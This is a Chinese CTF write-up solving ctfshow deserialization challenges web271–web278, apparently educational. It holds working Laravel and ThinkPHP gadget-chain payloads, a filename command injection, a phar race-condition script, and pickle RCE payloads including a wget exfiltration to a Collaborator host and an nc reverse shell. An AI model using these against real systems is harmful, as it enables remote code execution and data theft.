
ctfshow-web入门-反序列化(web271-web278)

目录

1、web271

2、web272

3、web273

4、web274

5、web275

6、web276

7、web277

8、web278


 

laravel 反序列化漏洞

1、web271

laravel 5.7(CVE-2019-9081)

poc

<?php
namespace Illuminate\Foundation\Testing{
    use Illuminate\Auth\GenericUser;
    use Illuminate\Foundation\Application;
    // Local stand-in for the framework class of the same name. It exists only
    // so that serialize() emits an object carrying this class name and these
    // property values; the real class's methods are not on this page, and the
    // chain presumably fires when the target unserialize()s the result
    // (CVE-2019-9081, Laravel 5.7 per the writeup).
    class PendingCommand
    {
        // Protected members serialize as "\0*\0name" (visible as %00%2A%00 in
        // the payload below), so visibility presumably has to match the
        // original class for unserialize() to restore them by name.
        protected $command;
        protected $parameters;
        public $test;
        protected $app;
        public function __construct(){
            $this->command="system";           // callable name the chain is expected to invoke
            $this->parameters[]="cat /flag";   // its argument list
            $this->test=new GenericUser();     // nested gadget, see namespace Illuminate\Auth below
            $this->app=new Application();      // nested gadget, see namespace Illuminate\Foundation below
        }
    }
}
namespace Illuminate\Foundation{
    // Stand-in for the service container. The only state carried is a
    // bindings entry that resolves the console Kernel contract to
    // Application itself — presumably so that whatever the chain resolves
    // from the container is a class that also exists on the target.
    class Application{
        protected $bindings = [];
        public function __construct(){
            $this->bindings=array(
                'Illuminate\Contracts\Console\Kernel'=>array(
                    'concrete'=>'Illuminate\Foundation\Application'
                )
            );
        }
    }
}
namespace Illuminate\Auth{
    // Stand-in used as PendingCommand::$test. Only the attributes array is
    // populated; the two keys are presumably read by the chain as
    // expectation state, and the values look arbitrary.
    class GenericUser
    {
        protected $attributes;
        public function __construct(){
            $this->attributes['expectedOutput']=['hello','world'];
            $this->attributes['expectedQuestions']=['hello','world'];
        }
    }
}
namespace{
 
    use Illuminate\Foundation\Testing\PendingCommand;
 
    // Emits the URL-encoded serialized object; this is the `data=` value
    // quoted under "payload" below.
    echo urlencode(serialize(new PendingCommand()));
}
 

payload:

data=O%3A44%3A%22Illuminate%5CFoundation%5CTesting%5CPendingCommand%22%3A4%3A%7Bs%3A10%3A%22%00%2A%00command%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00parameters%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7Ds%3A4%3A%22test%22%3BO%3A27%3A%22Illuminate%5CAuth%5CGenericUser%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00attributes%22%3Ba%3A2%3A%7Bs%3A14%3A%22expectedOutput%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22hello%22%3Bi%3A1%3Bs%3A5%3A%22world%22%3B%7Ds%3A17%3A%22expectedQuestions%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22hello%22%3Bi%3A1%3Bs%3A5%3A%22world%22%3B%7D%7D%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00bindings%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3Ba%3A1%3A%7Bs%3A8%3A%22concrete%22%3Bs%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3B%7D%7D%7D%7D

2、web272

Laravel 5.8(CVE-2019-9081)

poc

<?php
namespace Illuminate\Broadcasting{
    use Illuminate\Bus\Dispatcher;
    use Illuminate\Foundation\Console\QueuedCommand;
    // Entry object of the Laravel 5.8 chain. Only two protected members are
    // set: the dispatcher that carries the callable name and the event that
    // carries its argument (both defined below). As in web271 these are
    // stand-ins — the real classes' methods are not on this page.
    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct(){
            $this->events=new Dispatcher();
            $this->event=new QueuedCommand();
        }
    }
}
namespace Illuminate\Foundation\Console{
    // Stand-in whose public $connection holds the shell command; presumably
    // the value the dispatcher's resolver is applied to.
    class QueuedCommand
    {
        public $connection="cat /flag";
    }
}
namespace Illuminate\Bus{
    // Stand-in whose queueResolver holds the callable name ("system") that
    // the chain is expected to call with QueuedCommand::$connection.
    class Dispatcher
    {
        protected $queueResolver="system";
 
    }
}
namespace{
 
    use Illuminate\Broadcasting\PendingBroadcast;
 
    // Emits the URL-encoded serialized object quoted under "payload" below.
    echo urlencode(serialize(new PendingBroadcast()));
}

payload:

data=O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A25%3A%22Illuminate%5CBus%5CDispatcher%22%3A1%3A%7Bs%3A16%3A%22%00%2A%00queueResolver%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A8%3A%22%00%2A%00event%22%3BO%3A43%3A%22Illuminate%5CFoundation%5CConsole%5CQueuedCommand%22%3A1%3A%7Bs%3A10%3A%22connection%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7D%7D

3、web273

Laravel 5.8(CVE-2019-9081)

沿用 web272 的 payload:

data=O%3A40%3A%22Illuminate%5CBroadcasting%5CPendingBroadcast%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00events%22%3BO%3A25%3A%22Illuminate%5CBus%5CDispatcher%22%3A1%3A%7Bs%3A16%3A%22%00%2A%00queueResolver%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A8%3A%22%00%2A%00event%22%3BO%3A43%3A%22Illuminate%5CFoundation%5CConsole%5CQueuedCommand%22%3A1%3A%7Bs%3A10%3A%22connection%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7D%7D

4、web274

ThinkPHP V5.1

exp

<?php
namespace think;

// Stand-in for think\Model. $data is private, so it serializes under the
// class-mangled key "\0think\Model\0data" — which is why the subclass Pivot
// below still emits it under the Model name. Both arrays use the same key
// ("li"), presumably so the chain pairs the appended attribute with the
// Request object stored in $data.
abstract class Model{
    protected $append = [];
    private $data = [];
    public function __construct()
    {
        $this->append = ["li"=>[]];
        $this->data = ["li"=>new Request()];
    }
}
namespace think\process\pipes;
use think\model\Pivot;
// Outermost object of the chain. $files is private (serialized as
// "\0think\process\pipes\Windows\0files") and holds the Pivot model;
// presumably the real class iterates its entries on teardown, which is what
// would start the chain — that code is not on this page.
class Windows{
    private $files = [];
    public function __construct()
    {
        $this->files = [new Pivot()];
    }
}
namespace think\model;
use think\model;
// Concrete subclass so that the abstract Model above can be instantiated;
// it serializes with Model's constructor state and no members of its own.
class Pivot extends Model{

}
namespace think;
// Stand-in for think\Request. $hook maps "visible" to [$this, "isAjax"]; the
// $this reference serializes as a back-reference (r:N in the payload).
// $filter names the function ("system") and $param holds its argument;
// $config leaves var_ajax empty. How the real class wires these together is
// not on this page.
class Request{
    protected $hook = [];
    protected $filter;
    protected $config;
    protected $param = [];
    public function __construct()
    {
        $this->hook = ["visible"=>[$this,"isAjax"]];
        $this->filter = 'system';
        $this->config = ["var_ajax"=>''];
        $this->param = ['cat /f*'];
    }
}
use think\process\pipes\Windows;
// Base64 this time (web271/272 used urlencode); the output is the ?data=
// value quoted under "payload" below.
echo base64_encode(serialize(new Windows()));
?>

payload:

?data=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czoyOiJsaSI7YTowOnt9fXM6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6MjoibGkiO086MTM6InRoaW5rXFJlcXVlc3QiOjQ6e3M6NzoiACoAaG9vayI7YToxOntzOjc6InZpc2libGUiO2E6Mjp7aTowO3I6NztpOjE7czo2OiJpc0FqYXgiO319czo5OiIAKgBmaWx0ZXIiO3M6Njoic3lzdGVtIjtzOjk6IgAqAGNvbmZpZyI7YToxOntzOjg6InZhcl9hamF4IjtzOjA6IiI7fXM6ODoiACoAcGFyYW0iO2E6MTp7aTowO3M6NzoiY2F0IC9mKiI7fX19fX19

5、web275

system('rm '.$this->filename);

filename 可控,使用分号截断实现命令执行

?fn=1.php;ls;

读取 flag.php

?fn=1.php;tac flag.php;

拿到 flag:ctfshow{28fb8db5-7e60-4876-9079-f4e64554eb77}

6、web276

新增对 admin 的判断

public $admin = false; admin 默认是 false ,我们需要修改它为 true 才会进入 system。

但是这里无法直接修改,我们可以采用 phar 文件来触发,当读取 phar 文件时,会自动反序列化 manifest 中的字符串,采用 phar 协议来读取即可。

生成 phar 文件:

<?php
// Mirror of the target's filter class. The writeup notes admin defaults to
// false on the target and must be true to reach system(); filename reuses the
// semicolon trick from web275 so the rm command line carries a second command.
class filter{
    public $filename = "1.php;tac f*;";
    public $filecontent;
    public $evilfile = true;
    public $admin = true;
}
$o = new filter();

// Phar metadata is stored serialized; the writeup's premise is that reading
// the file through phar:// makes PHP unserialize it, which substitutes for
// the missing direct control over $admin. startBuffering/stopBuffering defer
// the writes so the stub, metadata and the dummy entry land in one pass.
$phar = new Phar("my.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($o);
$phar->addFromString("my.txt", "my");
$phar->stopBuffering();
?>

这里还需要结合条件竞争,因为我们写入的这个 phar 文件会被删除,我们需要在它还没有被删除前访问到它,触发反序列化。

exp:

import threading
import requests

url = "http://882d7c83-d5eb-4fec-abd6-3eca2abc1283.challenge.ctf.show/"  # challenge instance URL (per-run id)
content: bytes = open("my.phar", "rb").read()  # archive built above; the handle is never closed explicitly (no `with`)
found_flag: bool = False  # set by read() once a flag string is seen; polled by the loop below

def upload() -> None:
    """POST the phar bytes to the target under the name my.phar.

    The writeup notes the target deletes the written file, so this is
    called repeatedly to keep a copy present while read() races it.
    """
    requests.post(url=url + "?fn=my.phar", data=content)

def read() -> None:
    """Request the uploaded file through phar:// and watch for a flag.

    Sets the module-level found_flag so the spawning loop stops. The flag
    only ever goes False -> True and is never reset, so no lock is used;
    presumably fine under the GIL, but not formally synchronised.
    """
    global found_flag
    response = requests.post(url=url + "?fn=phar://my.phar/", data="1")
    if "ctfshow{" in response.text or "flag{" in response.text:
        print(response.text)
        found_flag = True

# Race loop: two threads per iteration, never joined and never bounded, so
# the number of outstanding requests is limited only by how fast they
# complete. Stops once read() has set found_flag.
while not found_flag:
    threading.Thread(target=upload).start()
    threading.Thread(target=read).start()

拿到 flag:ctfshow{99e96faa-80bf-4ba6-b915-dfbdccf5067a}

7、web277

python 反序列化

import os
import pickle
import base64

class RCE(object):
    """Object whose pickle encodes a call rather than data.

    pickle.dumps records the (callable, args) tuple returned by __reduce__,
    so any pickle.loads of the bytes calls os.popen(cmd). The command wgets
    the Collaborator host with the output of `cat f*` in the query string
    (out-of-band exfiltration, see the text below). This is exactly why
    unpickling untrusted input is code execution: the defence is to not
    unpickle untrusted bytes at all (use JSON), or to restrict
    Unpickler.find_class to an allow-list.
    """
    def __reduce__(self):
        return (os.popen, ('wget il7p6a9q8k2lxm0uh96ux3uif9l09rxg.oastify.com?1=`cat f*`',))

# Base64 of the pickle; this is the `data=` value in the payload below.
print(base64.b64encode(pickle.dumps(RCE())))

结合 bp 的 Collaborator 模块外带

payload:

backdoor?data=gASVUwAAAAAAAACMAm9zlIwFcG9wZW6Uk5SMPHdnZXQgaWw3cDZhOXE4azJseG0wdWg5NnV4M3VpZjlsMDlyeGcub2FzdGlmeS5jb20/MT1gY2F0IGYqYJSFlFKULg==

 

拿到 flag:ctfshow{2d4f0ae3-dc87-4c9d-b054-9e563bc3886a} 

也可以反弹 shell

import pickle
import base64

class cmd():
    """Reverse-shell variant of the same gadget.

    __reduce__ hands eval a string that imports os and runs nc; "ip port"
    are placeholders for the listener. Same mechanism and same defence as
    RCE above — never unpickle bytes from an untrusted source.
    """
    def __reduce__(self):
        return (eval,("__import__('os').popen('nc ip port -e /bin/sh').read()",))

c = cmd()
c = pickle.dumps(c)  # rebinds `c` from the object to its pickled bytes
print(base64.b64encode(c))

8、web278

过滤了 os.system,方法同上


原文地址:https://blog.csdn.net/Myon5/article/details/143657655
